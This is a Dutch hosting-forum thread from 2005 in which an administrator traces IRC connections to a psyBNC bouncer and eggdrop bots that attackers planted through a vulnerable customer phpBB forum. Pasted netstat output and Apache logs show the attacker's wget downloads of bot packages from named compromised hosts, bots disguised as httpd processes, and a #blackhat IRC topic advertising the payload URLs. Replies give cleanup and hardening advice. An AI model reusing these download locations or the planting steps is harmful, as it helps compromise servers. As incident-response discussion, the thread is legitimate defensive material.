Bekijk Volledige Versie : Vage connecties ircd? 24/7 online?!
Sinds een dag zie ik een aantal ips die echt al dagen online zijn op de server, en geconnected. Heb de betreffende ips al gebanned op de server. Firewalls draaien gewoon maar toch blijven ze.
Zie netstat logje:
tcp 0 0 server01.technotop.nl:45430 195.50.191.14:6666 ESTABLISHED
tcp 0 0 server01.technotop.nl:45436 195.50.191.14:6666 ESTABLISHED
tcp 0 0 technotop.nl:http 82-171-139-203.dsl.ip:17582 TIME_WAIT
tcp 0 0 server01.technotop.nl:45481 195.50.191.14:6666 ESTABLISHED
tcp 0 0 server01.technotop.nl:45448 195.50.191.14:6666 ESTABLISHED
tcp 0 0 technotop.nl:http cp236485-a.tilbu1.nb.h:3971 FIN_WAIT2
tcp 0 0 server01.technotop.nl:43491 194.14.236.50:ircd ESTABLISHED
tcp 0 0 server01.technotop.nl:47792 194.14.236.50:6666 ESTABLISHED
Snap erniet veel van want wij zegt: ESTABLISHED Hoe kan dat? De ips zijn al gebanned en toch blijven ze?
Ik draai verder geen IRC services op de server.
Misschien een backdoor of rootkit?
Uhmmmm :O zie dit net tot mijn schrik en grote verbazing... firewalls.. alles staat te brommen...
http://technotop.nl:7000/
hmmmm poorten weer naar gelopen... firewall weer gerestart... heb er een hard hoofd in :O Dit is namelijk een best ernstige zaak waar ik echt met toeval op kwam :O
Zie nergens meldingen etc, bij nmap staan wat poorten open... probeer ze te dichten maar deze hele poorten staan al helemaal niet in de rullez van de firewall :O
Ik weet niet wat er precies stond, kan nu niets zien, maar ik kan je in ieder geval adviseren Rootkit Hunter (http://www.rootkit.nl/projects/rootkit_hunter.html) en Chkrootkit (http://freshmeat.net/projects/chkrootkit/) (site lijkt down mgoed) eens te draaien. Mochten die rare dingen geven, gooi dan gewoon je netwerkverbinding eruit, ga naar het DC, haal de data eraf en reinstall. (Zoek bij voorkeur ook nog even uit hoe ze binnen zijn gekomen ;) )
Het kan ook wat kleiners zijn. Als je bij netstat poorten open ziet staan/verbindingen ziet, draai netstat dan eens met de -p parameter, dan zie je ook welk proces die poorten gebruikt. Misschien heeft gewoon een webuser lokaal onder zijn eigen user iets gestart. Trap in dat geval die user flink hard (en laat hem bv. zijn phpBB updaten), kill die processen en ruim het zooitje op.
Origineel geplaatst door MikeN
Ik weet niet wat er precies stond, kan nu niets zien, maar ik kan je in ieder geval adviseren Rootkit Hunter (http://www.rootkit.nl/projects/rootkit_hunter.html) en Chkrootkit (http://freshmeat.net/projects/chkrootkit/) (site lijkt down mgoed) eens te draaien. Mochten die rare dingen geven, gooi dan gewoon je netwerkverbinding eruit, ga naar het DC, haal de data eraf en reinstall. (Zoek bij voorkeur ook nog even uit hoe ze binnen zijn gekomen ;) )
Het kan ook wat kleiners zijn. Als je bij netstat poorten open ziet staan/verbindingen ziet, draai netstat dan eens met de -p parameter, dan zie je ook welk proces die poorten gebruikt. Misschien heeft gewoon een webuser lokaal onder zijn eigen user iets gestart. Trap in dat geval die user flink hard (en laat hem bv. zijn phpBB updaten), kill die processen en ruim het zooitje op.
Het is een trojan (tenminste dat haal ik er uit)
Naam die nmap bij de poort geeft is:
afs3-fileserver
Rare is dat heel poort 7000 niet in de firewall staat....heel vaag.. ik probeer het even te fixen..
Wie is familie BOUMAN? Naja die probeert de fileserver te draaien...
Log van netstat:
tcp 0 0 server01.technotop.nl:50199 194.14.236.50:6666 ESTABLISHED 15633/httpd -DSSL
tcp 0 0 server01.technotop.nl:50202 194.14.236.50:6666 ESTABLISHED 16174/httpd -DSSL
tcp 0 0 server01.technotop.nl:50201 194.14.236.50:6666 ESTABLISHED 15607/httpd -DSSL
tcp 0 0 server01.technotop.nl:50200 194.14.236.50:6666 ESTABLISHED 15577/httpd -DSSL
tcp 0 0 server01.technotop.nl:43491 194.14.236.50:ircd ESTABLISHED 21686/sendmail: a cc
tcp 0 0 server01.technotop.nl:47792 194.14.236.50:6666 ESTABLISHED 15662/httpd -DSSL
Erg raar allemaal, ik restart heel httpd eens even.
http://technotop.nl/forum/ is waarschijnlijk de schuldige! Update zsm phpbb want dit gebruiken ze om die shit(eggdrop) te uploaden.
Lees anders http://linuxreviews.org/software/irc/bnc/ eens als je niet weet waar het over gaat.
Origineel geplaatst door Domenico
http://technotop.nl/forum/ is waarschijnlijk de schuldige! Update zsm phpbb want dit gebruiken ze om die shit(eggdrop) te uploaden.
Lees anders http://linuxreviews.org/software/irc/bnc/ eens als je niet weet waar het over gaat.
rkhunter kan niets vinden, alles is oké. Forum heb ik er gelijk even afgehaald (niemand die het gebruikt)
Ik overweeg een herinstall van de server, maar zover wil ik het nog niet laten gaan.... ik ga momenteel nog even verder met zoeken.
Origineel geplaatst door Domenico
http://technotop.nl/forum/ is waarschijnlijk de schuldige! Update zsm phpbb want dit gebruiken ze om die shit(eggdrop) te uploaden.
Lees anders http://linuxreviews.org/software/irc/bnc/ eens als je niet weet waar het over gaat.
Ja het is psyBNC!!!! Toen :7000 online was kreeg je een website van psyBNC!!
Uhmmmmmmm zit iets heel goed mis, ik ben nu druk bezig met de server zelf.. net even de apache log bekeken.... niet echt leuk om te zien:
--12:51:09-- http://www.lcat.lsu.edu/hastac/bb/images/avatars/.xl/.anggands/zregbot.tar.gz
=> `zregbot.tar.gz'
Resolving www.lcat.lsu.edu... 130.39.185.75
Connecting to www.lcat.lsu.edu[130.39.185.75]:80... connected.
HTTP verzoek verzonden, wacht op antwoord... 200 OK
Lengte: 847,485 [application/x-gzip]
0K .......... .......... .......... .......... .......... 6% 88.64 KB/s
50K .......... .......... .......... .......... .......... 12% 173.88 KB/s
100K .......... .......... .......... .......... .......... 18% 349.99 KB/s
150K .......... .......... .......... .......... .......... 24% 185.00 KB/s
200K .......... .......... .......... .......... .......... 30% 237.72 KB/s
250K .......... .......... .......... .......... .......... 36% 78.09 KB/s
300K .......... .......... .......... .......... .......... 42% 92.26 KB/s
350K .......... .......... .......... .......... .......... 48% 185.10 KB/s
400K .......... .......... .......... .......... .......... 54% 125.39 KB/s
450K .......... .......... .......... .......... .......... 60% 175.07 KB/s
500K .......... .......... .......... .......... .......... 66% 174.02 KB/s
550K .......... .......... .......... .......... .......... 72% 162.02 KB/s
600K .......... .......... .......... .......... .......... 78% 184.85 KB/s
650K .......... .......... .......... .......... .......... 84% 125.23 KB/s
700K .......... .......... .......... .......... .......... 90% 74.56 KB/s
750K .......... .......... .......... .......... .......... 96% 123.36 KB/s
800K .......... .......... ....... 100% 203.05 KB/s
12:51:16 (135.91 KB/s) - `zregbot.tar.gz' saved [847,485/847,485]
--12:54:10-- http://j.domaindlx.com/after99/TCL/wul.tcl
=> `wul.tcl'
Resolving j.domaindlx.com... 66.36.238.34
Connecting to j.domaindlx.com[66.36.238.34]:80... connected.
HTTP verzoek verzonden, wacht op antwoord... 200 OK
Lengte: 267,256 [application/x-tcl]
0K .......... .......... .......... .......... .......... 19% 143.83 KB/s
50K .......... .......... .......... .......... .......... 38% 278.11 KB/s
100K .......... .......... .......... .......... .......... 57% 274.33 KB/s
150K .......... .......... .......... .......... .......... 76% 279.87 KB/s
200K .......... .......... .......... .......... .......... 95% 268.42 KB/s
250K .......... 100% 150.66 KB/s
12:54:12 (227.43 KB/s) - `wul.tcl' saved [267,256/267,256]
==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 15576
[12:56] --- Loading eggdrop v1.6.6 (Thu Dec 29 2005)
[12:56] Module loaded: transfer
[12:56] Listening at telnet port 9999 (users)
[12:56] Module loaded: channels
[12:56] Module loaded: server
[12:56] Module loaded: ctcp
[12:56] Module loaded: irc
[12:56] Module loaded: share
[12:56] Module loaded: filesys (with lang support)
[12:56] Module loaded: notes (with lang support)
[12:56] Module loaded: console (with lang support)
[12:56] Module loaded: blowfish
[12:56] Module loaded: assoc (with lang support)
[12:56] Module loaded: wire (with lang support)
[12:56] ======================================
[12:56] Wul tcl Loaded
[12:56] Reported any bugs to blackhat Crew #BlackHat
[12:56] ======================================
[12:56] Creating channel file
[12:56] === NiLLa^cae: 0 channels, 0 users.
[Thu Dec 29 12:56:12 2005] [error] [client 213.224.59.129] File does not exist: /var/www/html/favicon.ico
[Thu Dec 29 12:56:12 2005] [error] [client 213.224.59.129] File does not exist: /var/www/html/404.shtml
[Thu Dec 29 12:56:13 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:56:13 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 12:56:13 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:56:13 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 12:56:25 2005] [error] [client 213.224.59.129] File does not exist: /var/www/html/favicon.ico
[Thu Dec 29 12:56:25 2005] [error] [client 213.224.59.129] File does not exist: /var/www/html/404.shtml
[Thu Dec 29 12:56:31 2005] [error] [client 213.224.59.129] File does not exist: /var/www/html/favicon.ico
[Thu Dec 29 12:56:31 2005] [error] [client 213.224.59.129] File does not exist: /var/www/html/404.shtml
==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 15606
[12:57] --- Loading eggdrop v1.6.6 (Thu Dec 29 2005)
[12:57] Module loaded: transfer
[12:57] Listening at telnet port 9999 (users)
[12:57] Module loaded: channels
[12:57] Module loaded: server
[12:57] Module loaded: ctcp
[12:57] Module loaded: irc
[12:57] Module loaded: share
[12:57] Module loaded: filesys (with lang support)
[12:57] Module loaded: notes (with lang support)
[12:57] Module loaded: console (with lang support)
[12:57] Module loaded: blowfish
[12:57] Module loaded: assoc (with lang support)
[12:57] Module loaded: wire (with lang support)
[12:57] ======================================
[12:57] Wul tcl Loaded
[12:57] Reported any bugs to blackhat Crew #BlackHat
[12:57] ======================================
[12:57] Creating channel file
[12:57] === Dwi^caem: 0 channels, 0 users.
[Thu Dec 29 12:57:11 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:57:11 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 12:57:11 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:57:11 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 15632
[12:58] --- Loading eggdrop v1.6.6 (Thu Dec 29 2005)
[12:58] Module loaded: transfer
[12:58] Listening at telnet port 9999 (users)
[12:58] Module loaded: channels
[12:58] Module loaded: server
[12:58] Module loaded: ctcp
[12:58] Module loaded: irc
[12:58] Module loaded: share
[12:58] Module loaded: filesys (with lang support)
[12:58] Module loaded: notes (with lang support)
[12:58] Module loaded: console (with lang support)
[12:58] Module loaded: blowfish
[12:58] Module loaded: assoc (with lang support)
[12:58] Module loaded: wire (with lang support)
[12:58] ======================================
[12:58] Wul tcl Loaded
[12:58] Reported any bugs to blackhat Crew #BlackHat
[12:58] ======================================
[12:58] Creating channel file
[12:58] === Vie^caem: 0 channels, 0 users.
[Thu Dec 29 12:58:31 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:58:31 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 12:58:32 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:58:32 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 15661
[12:59] --- Loading eggdrop v1.6.6 (Thu Dec 29 2005)
[12:59] Module loaded: transfer
[12:59] Listening at telnet port 9999 (users)
[12:59] Module loaded: channels
[12:59] Module loaded: server
[12:59] Module loaded: ctcp
[12:59] Module loaded: irc
[12:59] Module loaded: share
[12:59] Module loaded: filesys (with lang support)
[12:59] Module loaded: notes (with lang support)
[12:59] Module loaded: console (with lang support)
[12:59] Module loaded: blowfish
[12:59] Module loaded: assoc (with lang support)
[12:59] Module loaded: wire (with lang support)
[12:59] ======================================
[12:59] Wul tcl Loaded
[12:59] Reported any bugs to blackhat Crew #BlackHat
[12:59] ======================================
[12:59] Creating channel file
[12:59] === Ratih^cae: 0 channels, 0 users.
[Thu Dec 29 12:59:52 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:59:52 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 12:59:52 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 12:59:52 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 16173
[13:02] --- Loading eggdrop v1.6.6 (Thu Dec 29 2005)
[13:02] Module loaded: transfer
[13:02] Listening at telnet port 9999 (users)
[13:02] Module loaded: channels
[13:02] Module loaded: server
[13:02] Module loaded: ctcp
[13:02] Module loaded: irc
[13:02] Module loaded: share
[13:02] Module loaded: filesys (with lang support)
[13:02] Module loaded: notes (with lang support)
[13:02] Module loaded: console (with lang support)
[13:02] Module loaded: blowfish
[13:02] Module loaded: assoc (with lang support)
[13:02] Module loaded: wire (with lang support)
[13:02] ======================================
[13:02] Wul tcl Loaded
[13:02] Reported any bugs to blackhat Crew #BlackHat
[13:02] ======================================
[13:02] Creating channel file
[13:02] === BajanG^je: 0 channels, 0 users.
[Thu Dec 29 13:02:18 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 13:02:18 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 13:02:18 2005] [error] [client 195.50.191.14] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 13:02:18 2005] [error] [client 195.50.191.14] File does not exist: /home/reseller/domains/sharedip/403.shtml
en
Connecting to mesh.dl.sourceforge.net[213.203.218.122]:80... connected.
HTTP verzoek verzonden, wacht op antwoord... 200 OK
Lengte: 954,541 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 912.36 KB/s
50K .......... .......... .......... .......... .......... 10% 3.10 MB/s
100K .......... .......... .......... .......... .......... 16% 1.84 MB/s
150K .......... .......... .......... .......... .......... 21% 1.89 MB/s
200K .......... .......... .......... .......... .......... 26% 3.08 MB/s
250K .......... .......... .......... .......... .......... 32% 1.88 MB/s
300K .......... .......... .......... .......... .......... 37% 3.14 MB/s
350K .......... .......... .......... .......... .......... 42% 1.87 MB/s
400K .......... .......... .......... .......... .......... 48% 1.89 MB/s
450K .......... .......... .......... .......... .......... 53% 3.07 MB/s
500K .......... .......... .......... .......... .......... 59% 1.87 MB/s
550K .......... .......... .......... .......... .......... 64% 3.08 MB/s
600K .......... .......... .......... .......... .......... 69% 1.90 MB/s
650K .......... .......... .......... .......... .......... 75% 1.89 MB/s
700K .......... .......... .......... .......... .......... 80% 3.08 MB/s
750K .......... .......... .......... .......... .......... 85% 615.60 KB/s
800K .......... .......... .......... .......... .......... 91% 3.16 MB/s
850K .......... .......... .......... .......... .......... 96% 1.87 MB/s
900K .......... .......... .......... .. 100% 2.31 MB/s
23:29:17 (1.84 MB/s) - `torrentflux-2.0beta1.tar.gz' saved [954,541/954,541]
ls: config.php: Onbekend bestand of map
rm: te weinig argumenten
Probeer `rm --help' voor meer informatie.
sh: line 1: /tmp/output.txt: Toegang geweigerd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 308 0 308 0 0 1097 0 --:--:-- --:--:-- --:--:-- 1097
100 308 0 308 0 0 1095 0 --:--:-- --:--:-- --:--:-- 0
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 304 0 304 0 0 1133 0 --:--:-- --:--:-- --:--:-- 1133
100 304 0 304 0 0 1132 0 --:--:-- --:--:-- --:--:-- 0
rm: kan `.' of `..' niet verwijderen
rm: kan `.' of `..' niet verwijderen
rm: te weinig argumenten
Probeer `rm --help' voor meer informatie.
sh: line 1: /tmp/output.txt: Toegang geweigerd
[Thu Dec 29 00:02:02 2005] [error] [client 213.224.83.20] File does not exist: /var/www/html/favicon.ico
[Thu Dec 29 00:02:02 2005] [error] [client 213.224.83.20] File does not exist: /var/www/html/404.shtml
[Thu Dec 29 00:02:07 2005] [error] [client 213.224.83.20] File does not exist: /var/www/html/401.shtml
[Thu Dec 29 00:02:25 2005] [error] [client 213.224.83.20] File does not exist: /home/tizon/public_html/js/popup.js
[Thu Dec 29 00:02:25 2005] [error] [client 213.224.83.20] File does not exist: /var/www/html/404.shtml
[Thu Dec 29 00:02:25 2005] [error] [client 213.224.83.20] File does not exist: /home/tizon/public_html/hld/print.gif
[Thu Dec 29 00:02:25 2005] [error] [client 213.224.83.20] File does not exist: /var/www/html/404.shtml
[Thu Dec 29 00:13:02 2005] [notice] SIGHUP received. Attempting to restart
[Thu Dec 29 00:13:02 2005] [notice] Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a PHP/4.3.11 mod_perl/1.29 FrontPage/5.0.2.2510 configured -- resuming normal operations
[Thu Dec 29 00:13:02 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Thu Dec 29 00:13:02 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Thu Dec 29 00:13:10 2005] [error] [client 194.14.236.50] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 00:13:10 2005] [error] [client 194.14.236.50] File does not exist: /home/reseller/domains/sharedip/403.shtml
[Thu Dec 29 00:13:10 2005] [error] [client 194.14.236.50] client denied by server configuration: /home/reseller/domains/sharedip
[Thu Dec 29 00:13:10 2005] [error] [client 194.14.236.50] File does not exist: /home/reseller/domains/sharedip/403.shtml
www.technotop.nl:7000
Ik krijg dit te zien:
:Welcome!psyBNC@lam3rz.de NOTICE * :psyBNC2.3.1
Login failed. Disconnecting.
Laatste update voor vandaag, heb het weten te achterhalen, het kan door een van mijn klanten, deze had en ou forum/script op zijn server staan.
Account momenteel op suspended en heb alle programmas gevonden van psybnc... ga nu kijken of ik ze gewoon kan deleten...
Mannemanneman. Dit is een klant welke ze zaken niet op orde heeft. Als jij dat nu wel hebt (Apache, PHP, Kernel gepatched), dan heb je hoogstwaarschijnlijk geen enkel probleem.
Spank de klant, ruim het forum op, spank opnieuw, kill de bouncer, doe een poortscan, en neem een bak koffie.
Dit ga je nog VEEL meemaken. Als je een beetje normaal denkt over security is er niets aan de hand.
De bouncer draaide als HTTPD. Als je verder niets geks ziet (check je /var /var/tmp en /dev/shm), is er 99% zeker weten niets aan de hand (of je bent flink de sjaak, maar daar komt die poortscan wel achter)
zal ook wel een eggdrop draaien als ik die apache log zie
Origineel geplaatst door DiedX
Mannemanneman. Dit is een klant welke ze zaken niet op orde heeft. Als jij dat nu wel hebt (Apache, PHP, Kernel gepatched), dan heb je hoogstwaarschijnlijk geen enkel probleem.
Spank de klant, ruim het forum op, spank opnieuw, kill de bouncer, doe een poortscan, en neem een bak koffie.
Dit ga je nog VEEL meemaken. Als je een beetje normaal denkt over security is er niets aan de hand.
De bouncer draaide als HTTPD. Als je verder niets geks ziet (check je /var /var/tmp en /dev/shm), is er 99% zeker weten niets aan de hand (of je bent flink de sjaak, maar daar komt die poortscan wel achter)
Het killen van de bouncer gaat redelijk moeilijk, alles stond onder andere pids, dus het was vannacht even uitzoeken. Krijg de bouncer maar niet weg, alles wat ik doe lijkt te valen.
Kijk straks even op mijn gemakje naar de var. Terwijl de tmp er ook niet echt clean uit ziet.
Eerst even op mijn gemak ontbijten, lange nacht achter de rug dus ga zo verder ;)
Btw, er draait idd een eggdrop "ergens" op de background, rare is dat geen enkel virus/trojan programma rkhunter etcetc iets kan vinden, allesis top clean en veilig..
Origineel geplaatst door trebbor
rare is dat geen enkel virus/trojan programma rkhunter etcetc iets kan vinden, allesis top clean en veilig..
Dat kan je NOOIT zeggen, al ben ik het redelijk met je eens.
Al geprobeerd met een kill -9?
Origineel geplaatst door DiedX
Dat kan je NOOIT zeggen, al ben ik het redelijk met je eens.
Al geprobeerd met een kill -9?
alles al.... hij zegt ook helemaal niets, hij runt alles onder apache/httpd.. -DSSL ofzo. Dus die probeer ik te killen.. ook het programma ./psyircd kan ik maar niet killen..
doe je apache eens stopzetten (vermoedelijk debian: apachectl stop). Daarna toch even met kill -9 hard afschieten.
Mja die httpd -DSSL zijn gekilled, + de ircbnc.. verder blijft poort 7000 open (raar want normaal kan een programma deze niet openen want dan zegt hij dat de firewall deze niet accepteert :S)
Uhmmm er blijft nog 1 draaien van de 5...
tcp 0 0 server01.technotop.nl:43491 194.14.236.50:ircd ESTABLISHED 21686/sendmail: acc
Dit is sendmail en heb niet veel zin om die uit te gooien....
Gewoon een kwestie van je server goed beveiligen.
Vroeger (aantal jaren terug) was ik ook een scriptkiddie en installeerde ik op een hoop 'gecrackte' servers botnets van 50-60 eggdrops en had dagen dat ik 10 bouncers (bnc) had.
Kijk naar je log waarhij de rootkit vandaan gedownload heeft en zoek in de setup naar de paths, meestal is het een simpele sh script.
Goede rootkits maken je daemon transparant waardoor deze niet te zien is in 'ps', dus ook niet te killen.
Zoek uit waarnaar toe de rootkit geinstalleerd is en verwijder alles, alleen ik ben bang dat dit niet zal helpen. Een goede rootkit vervangt namelijk een hele hoop commands (wget, rm, cp...).
Dus ik denk toch een goede backup van je database en gelijk een format.
ik ben het met saban eens. Dit ziet er wat meer uit als geroot-zijn.
Niet alleen httpd, maar ook sendmail draait die shit, en dan wordt het anders.
Begin een keertje met je /tmp noexec te maken maak root owner van wget , ftp , ncftpget , ncftp , lynx whatever. en chmod deze dat enkel root exec rights heeft. Dit bespaart je al 80 procent van alle ellende.
Origineel geplaatst door DiedX
ik ben het met saban eens. Dit ziet er wat meer uit als geroot-zijn.
Niet alleen httpd, maar ook sendmail draait die shit, en dan wordt het anders.
Nee we zijn niet ge-root, het probleem is verholpen. Ik heb de source weten te vinden, dus welke website gehackt is, welke bestanden er zijn gedownload etc.
De sendmail is wel helemaal verkloot, helaas maar gelukkig nam exim alles gelijk over. Ik probeer sendmail even te debuggen.
Verder was het nog knap lastig om de porten te dichten, :7000 is nu weer dicht en alles draait weer zoals het moet draaien.
PHP SAfemode staat nu aan op alle accounts, verder is de server even helemaal gecleaned.
De kereltjes die dit geflikt hebben zitten op DALnet een of andere Blackhat crew.
[13:40] * Now talking in #blackhat
[13:40] * Topic is '�4,1Welcome To #BlackHat �0,1BL��4,1�/\���0,1CKH��4,1A��0,1T��0,1 Org��9,1 Donlod psy,eggdrop, �0,1�9http://www.lcat.lsu.edu/hastac/bb/images/avatars/.xl/.anggands/ �0,1�11[http://1st.com.br/albums]�4,1 YG LULUS JADI OP DI #blackhat AKAN DI UMUMKAN VIA EMAIL THANKS��'
[13:40] * Set by Blackhat on Wed Dec 21 17:51:21
1ste klas kido's lijkt me, hebben een paar pakketjes op die site staan (waar ook een phpbb op draait en ze gebruiken de bugs in dit forum om hun rommel te uploaden) om dummy proof eggdrop en psybnc's te installeren. Maar verder geen spoor van rootkits wel elke binary's om processname's te spoofen maar niet schadelijk denk ik.